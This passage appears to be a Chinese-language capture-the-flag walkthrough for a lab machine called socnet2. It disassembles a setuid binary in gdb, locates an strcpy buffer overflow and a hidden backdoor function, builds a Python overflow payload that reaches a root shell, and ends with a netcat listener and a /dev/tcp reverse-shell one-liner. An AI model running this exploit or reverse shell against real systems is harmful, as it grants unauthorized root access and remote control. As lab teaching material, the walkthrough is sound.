mov eax,DWORD PTR [ebp-0x40] 0x08048880 <+424>: sub esp,0x4 0x08048883 <+427>: lea esi,[ebp-0xac] 0x08048889 <+433>: push esi 0x0804888a <+434>: push ecx 0x0804888b <+435>: push edx 0x0804888c <+436>: push eax 0x0804888d <+437>: lea eax,[ebp-0x39] 0x08048890 <+440>: push eax 0x08048891 <+441>: lea eax,[ebx-0x12ec] 0x08048897 <+447>: push eax 0x08048898 <+448>: push DWORD PTR [ebp-0x1c] 0x0804889b <+451>: call 0x8048510 <fprintf@plt> 0x080488a0 <+456>: add esp,0x20 0x080488a3 <+459>: sub esp,0xc 0x080488a6 <+462>: push DWORD PTR [ebp-0x1c] 0x080488a9 <+465>: call 0x80484c0 <fclose@plt> 0x080488ae <+470>: add esp,0x10 0x080488b1 <+473>: mov eax,0x0 0x080488b6 <+478>: lea esp,[ebp-0x10] 0x080488b9 <+481>: pop ecx 0x080488ba <+482>: pop ebx 0x080488bb <+483>: pop esi 0x080488bc <+484>: pop edi 0x080488bd <+485>: pop ebp 0x080488be <+486>: lea esp,[ecx-0x4] 0x080488c1 <+489>: ret-
重点关注
call命令后的内容,一般是函数调用- 比如此段
0x08048729 <+81>: call 0x8048520 <fopen@plt>就是打开文件用的
- 比如此段
-
其中可疑的
0x08048834 <+348>: call 0x80486ad <vuln>可能是程序制作者编写的函数,一般带@的说明是内建的
-
-
使用
info func查看所有函数-
其中关键的函数
0x080484f0 system@plt0x08048530 setuid@plt
-
可疑的
0x08048676 backdoorbackdoor 有后门的意思0x080486ad vuln
-
-
使用
disas vuln查看 vuln 函数的汇编0x080486ad <+0>: push ebp 0x080486ae <+1>: mov ebp,esp 0x080486b0 <+3>: push ebx 0x080486b1 <+4>: sub esp,0x44 0x080486b4 <+7>: call 0x80488c2 <__x86.get_pc_thunk.ax> 0x080486b9 <+12>: add eax,0x168f 0x080486be <+17>: sub esp,0x8 0x080486c1 <+20>: push DWORD PTR [ebp+0x8] 0x080486c4 <+23>: lea edx,[ebp-0x3a] 0x080486c7 <+26>: push edx 0x080486c8 <+27>: mov ebx,eax 0x080486ca <+29>: call 0x80484d0 <strcpy@plt> 0x080486cf <+34>: add esp,0x10 0x080486d2 <+37>: nop 0x080486d3 <+38>: mov ebx,DWORD PTR [ebp-0x4] 0x080486d6 <+41>: leave 0x080486d7 <+42>: ret- 其中缓冲区漏洞可能是
0x080486ca <+29>: call 0x80484d0 <strcpy@plt>造成
- 其中缓冲区漏洞可能是
-
在查看 backdoor
0x08048676 <+0>: push ebp 0x08048677 <+1>: mov ebp,esp 0x08048679 <+3>: push ebx 0x0804867a <+4>: sub esp,0x4 0x0804867d <+7>: call 0x80485b0 <__x86.get_pc_thunk.bx> 0x08048682 <+12>: add ebx,0x16c6 0x08048688 <+18>: sub esp,0xc 0x0804868b <+21>: push 0x0 0x0804868d <+23>: call 0x8048530 <setuid@plt> 0x08048692 <+28>: add esp,0x10 0x08048695 <+31>: sub esp,0xc 0x08048698 <+34>: lea eax,[ebx-0x13f8] 0x0804869e <+40>: push eax 0x0804869f <+41>: call 0x80484f0 <system@plt> 0x080486a4 <+46>: add esp,0x10 0x080486a7 <+49>: nop 0x080486a8 <+50>: mov ebx,DWORD PTR [ebp-0x4] 0x080486ab <+53>: leave 0x080486ac <+54>: ret- 涉及大量的系统级函数
我们需要制作一个包含注入用的文件做为输入
python -c "import struct; print('aa\n1\n1\n1\n' + 'a' * 62 + struct.pack('I', 0x08048676))" > text
-
0x08048676是 backdoor 的起始位置 -
struct.pack 函数是反置
0x08048676socnet@socnet2:~$ python -c "import struct; print('aa\n1\n1\n1\n' + 'a' * 62 + struct.pack('I', 0x08048676))" > text < + 'a' * 62 + struct.pack('I', 0x08048676))" > text socnet@socnet2:~$ ls ls add_record monitor.py peda-session-add_record.txt employee_records.txt peda text socnet@socnet2:~$ gdb -q ./add_record gdb -q ./add_record Reading symbols from ./add_record...(no debugging symbols found)...done. gdb-peda$ break vuln break vuln Breakpoint 1 at 0x80486b1 gdb-peda$ r < text- break vuln 是在 vuln 函数打断点调试
- 一直用
s下一步直到出现 backdoor
[-------------------------------------code-------------------------------------] 0x8048673 <frame_dummy+3>: pop ebp 0x8048674 <frame_dummy+4>: jmp 0x8048600 <register_tm_clones> 0x8048676 <backdoor>: push ebp => 0x8048677 <backdoor+1>: mov ebp,esp 0x8048679 <backdoor+3>: push ebx 0x804867a <backdoor+4>: sub esp,0x4 0x804867d <backdoor+7>: call 0x80485b0 <__x86.get_pc_thunk.bx> 0x8048682 <backdoor+12>: add ebx,0x16c6 [------------------------------------stack-------------------------------------] 0000| 0xffffdc5c ("aaaa") 0004| 0xffffdc60 --> 0xffffdc00 --> 0xffffdc1e ('a' <repeats 66 times>) 0008| 0xffffdc64 --> 0xffffdce0 --> 0x1 0012| 0xffffdc68 --> 0xffffdd28 --> 0x0 0016| 0xffffdc6c --> 0x80487ef (<main+279>: mov DWORD PTR [ebp-0x20],eax) 0020| 0xffffdc70 --> 0x0 0024| 0xffffdc74 --> 0x0 0028| 0xffffdc78 --> 0xc2 [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0x08048677 in backdoor ()0x804868d <backdoor+23>: call 0x8048530 <setuid@plt>在 backdoor 23 开始调用<setuid@plt>
0xf7e29d10 <system>: sub esp,0xc 0xf7e29d13 <system+3>: mov eax,DWORD PTR [esp+0x10] 0xf7e29d17 <system+7>: call 0xf7f21c7d 0xf7e29d1c <system+12>: add edx,0x1982e4 0xf7e29d22 <system+18>: test eax,eax [------------------------------------stack-------------------------------------] 0000| 0xffffdc40 --> 0x80486a4 (<backdoor+46>: add esp,0x10) 0004| 0xffffdc44 --> 0x8048950 ("/bin/bash") 0008| 0xffffdc48 ("aaaaaaaa\202\206\004\b", 'a' <repeats 12 times>) 0012| 0xffffdc4c ("aaaa\202\206\004\b", 'a' <repeats 12 times>) 0016| 0xffffdc50 --> 0x8048682 (<backdoor+12>: add ebx,0x16c6) 0020| 0xffffdc54 ('a' <repeats 12 times>) 0024| 0xffffdc58 ("aaaaaaaa") 0028| 0xffffdc5c ("aaaa") [------------------------------------------------------------------------------] Legend: code, data, rodata, value 0xf7e29d10 in system () from /lib32/libc.so.6- 看到
"/bin/bash"已经内陷到system@plt此时的 bash 是 root 权限
观看完漏洞过程,使用是 cat text - | ./add_record
socnet@socnet2:~$ cat text - | ./add_record
cat text - | ./add_record
Welcome to Add Record application
Use it to add info about Social Network 2.0 Employees
id
id
uid=0(root) gid=1000(socnet) groups=1000(socnet),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
- 在 kali 再次开监听
nc -nvlp 6666 - 在漏洞内陷的 shell 使用
bash -i >& /dev/tcp/192.168.56.111/6666 0>&1反弹
结果
┌──(kali㉿kali)-[~/workspace]
└─$ nc -nvlp 6666
listening on [any] 6666 ...
connect to [192.168.56.111] from (UNKNOWN) [192.168.56.114] 46716
root@socnet2:~#
打靶结束
